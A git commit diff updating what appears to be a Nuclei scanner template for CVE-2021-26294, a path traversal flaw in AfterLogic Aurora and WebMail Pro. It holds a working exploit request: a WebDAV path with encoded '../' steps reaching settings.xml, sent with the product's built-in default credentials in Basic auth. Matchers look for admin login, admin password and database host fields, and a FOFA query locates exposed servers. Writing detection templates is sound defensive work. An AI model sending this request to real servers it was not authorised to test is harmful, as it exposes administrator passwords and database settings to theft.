Update CVE-2021-26294.yaml

patch-1
Ritik Chaddha 2023-11-25 15:58:09 +05:30 committed by GitHub
parent 5133d27cfb
commit cc559e6ac5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 13 deletions

View File

@ -1,10 +1,11 @@
id: CVE-2021-26294
info:
name: Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure
author: johnk3r
severity: high
description: AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and its the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and its the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-26294
@ -16,28 +17,34 @@ info:
cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
fofa-query: "X-Server: AfterlogicDAVServer"
vendor: AfterLogic
product: AfterLogic Aurora & WebMail
fofa-query: "X-Server: AfterlogicDAVServer"
tags: cve,cve2021,AfterLogic
tags: cve,cve2021,afterlogic,exposure
http:
- method: GET
path:
- "{{BaseURL}}/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
headers:
Authorization: "Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI"
- raw:
- |
GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
matchers-condition: and
matchers:
- type: word
part: body
words:
- "AdminLogin"
- "DBHost"
- "ApiKey"
- "<AdminLogin>"
- "<AdminPassword>"
- "<DBHost>"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200